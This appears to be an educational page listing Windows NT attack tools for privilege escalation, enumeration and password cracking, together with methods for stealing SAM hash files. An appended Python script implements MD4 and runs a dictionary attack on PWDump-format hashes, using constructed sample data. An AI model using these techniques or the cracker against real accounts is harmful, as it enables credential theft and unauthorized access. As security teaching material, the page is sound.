Windows Exploits
- GetAdmin - local privilege escalation exploit for Windows NT that adds an ordinary user account to the Administrators group
- CheckAdmin - lists who is a member of the Administrators group on the machines in your LAN
- Red Button - connects to a target machine over the NetBIOS ports (137 and 138 UDP, 139 TCP) as an anonymous "null session", i.e. without any credentials, and enumerates what the system exposes to anonymous users
- Winfo - remotely retrieves the list of user accounts, workstation trust accounts, interdomain trust accounts, server trust accounts, and shares
- WinFingerPrint - enumerates OS version, users, groups, SIDs, password policies, services, service packs and hotfixes, NetBIOS shares, transports, sessions, disks, the security event log, and the time of day, using the NT Domain (Net*), Active Directory, or WMI APIs
- Passwords
  - L0phtcrack - cracks LM/NT password hashes; the free version does dictionary attacks only, the brute-force version requires payment
  - NTSweep - free; guesses passwords by attempting to change them over the network rather than by logging on (a change request only succeeds when the guessed current password is correct)
  - NTCrack - dictionary cracker for NT password hashes
  - PWDump - dumps the LM and NT password hashes out of the SAM of a running system (requires administrator rights)
  - Advanced NT Security Explorer - recovers passwords from the SAM or from a PWDump file
- Obtaining passwords
  - Sniffing the password exchanges (the LM/NTLM challenge-response, not a cleartext password) off the network and cracking them offline - Ethereal - free network protocol analyzer
  - Booting into another OS (e.g. Linux or DOS) and copying the SAM file (e.g. with NTFSDOS or LINNT); the live SAM is locked while NT is running, so it cannot be copied from within NT itself
  - Using LINNT to obtain administrator access (only works on a pre-SP3 system WITHOUT SYSKEY enabled; SP3 introduced SYSKEY, which encrypts the hashes in the SAM with an additional system key)
  - Obtaining a copy of the SAM file from c:\winnt\repair (the compressed backup sam._ that rdisk /s writes there) or from a backup directory
  - Obtaining a copy from a tape backup or an emergency repair disk
  - Booting with another OS and changing the passwords (Offline NT Password and Registry Editor); this bypasses cracking entirely
- Scan ports - NetBrute Scanner; also scans for open shares
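The following is an added example, not a tool from this page: it shows what is done with a hash dump once the SAM has been copied and run through PWDump, namely the dictionary attack that L0phtcrack's free version performs, plus the checks a practitioner makes on each account before cracking (empty password, LM hash present, password of 7 characters or less). The PWDump line format is user:RID:LM hash:NT hash:::; the NT hash is MD4 of the UTF-16LE password, and MD4 is implemented inline because hashlib's md4 is often unavailable under OpenSSL 3. The sample dump and word list are constructed: Administrator carries the well-known LM/NT hashes of "password", Guest has an empty password, and svc_backup's NT hash is a made-up value that no word list entry matches.

```python
"""Classify a PWDump-style hash dump and run a dictionary attack on the NT hashes.

PWDump writes one line per account: user:RID:LM hash:NT hash:::
NT hash = MD4(password encoded as UTF-16LE).  MD4 is implemented below because
hashlib's "md4" is frequently missing on OpenSSL 3 builds.
"""
import struct

EMPTY_LM_HALF = "aad3b435b51404ee"               # LM hash of an empty 7-char half
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"     # MD4("") = NT hash of the empty password

# Constructed sample dump (not real data).  Administrator carries the well-known
# LM/NT hashes of "password"; Guest has an empty password; svc_backup's NT hash
# is an arbitrary hex string so it stays uncracked.
SAMPLE_DUMP = [
    "Administrator:500:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::",
    "Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::",
    "svc_backup:1001:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::",
]
WORDLIST = ["", "123456", "password", "letmein"]   # constructed mini dictionary


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & 0xFFFFFFFF


# (boolean function, additive constant, X index order, shift cycle) per MD4 round
_ROUNDS = (
    (lambda x, y, z: (x & y) | (~x & z), 0x00000000, tuple(range(16)), (3, 7, 11, 19)),
    (lambda x, y, z: (x & y) | (x & z) | (y & z), 0x5A827999,
     (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15), (3, 5, 9, 13)),
    (lambda x, y, z: x ^ y ^ z, 0x6ED9EBA1,
     (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15)),
)


def md4(data: bytes) -> bytes:
    """MD4 as specified in RFC 1320."""
    msg = bytearray(data) + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", (8 * len(data)) & 0xFFFFFFFFFFFFFFFF)
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        v = list(state)
        for func, const, order, shifts in _ROUNDS:
            for i, k in enumerate(order):
                # Each step updates one of a,b,c,d in the rotating order a,d,c,b.
                a, b, c, d = (v[(j - i) % 4] for j in range(4))
                v[(-i) % 4] = _rotl((a + func(b, c, d) + X[k] + const) & 0xFFFFFFFF,
                                    shifts[i % 4])
        state = [(s + w) & 0xFFFFFFFF for s, w in zip(state, v)]
    return struct.pack("<4I", *state)


def nt_hash(password: str) -> str:
    """NT hash: MD4 over the UTF-16LE encoding of the password, as hex."""
    return md4(password.encode("utf-16le")).hex()


def parse_pwdump(line: str):
    user, rid, lm, nt = line.strip().split(":")[:4]
    return user, int(rid), lm.lower(), nt.lower()


def assess(line: str, wordlist):
    """Flag weak-hash indicators for one account and try the word list against its NT hash."""
    user, rid, lm, nt = parse_pwdump(line)
    findings = []
    if nt == EMPTY_NT:
        findings.append("empty password")
    if lm != EMPTY_LM_HALF * 2:
        findings.append("LM hash stored: password <= 14 chars, case-folded, crackable in two 7-char halves")
        if lm[16:] == EMPTY_LM_HALF:
            findings.append("LM second half empty: password <= 7 chars")
    cracked = next((w for w in wordlist if nt_hash(w) == nt), None)
    return {"user": user, "rid": rid, "findings": findings, "cracked": cracked}


def audit(lines, wordlist=WORDLIST):
    """Assess every dump line; returns {user: result}."""
    return {r["user"]: r for r in (assess(line, wordlist) for line in lines)}


if __name__ == "__main__":
    for name, r in audit(SAMPLE_DUMP).items():
        print(f"{name} (RID {r['rid']}): cracked={r['cracked']!r} findings={r['findings']}")
```

Feed it real PWDump output instead of SAMPLE_DUMP and a real word list to reproduce the dictionary attack; the LM checks matter because an LM hash, when present, is attacked in two independent 7-character case-insensitive halves, which is why NT-era guidance was to disable LM hash storage and use passwords longer than 14 characters.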
Please mail any comments about this page to summers_wayne@ColumbusState.edu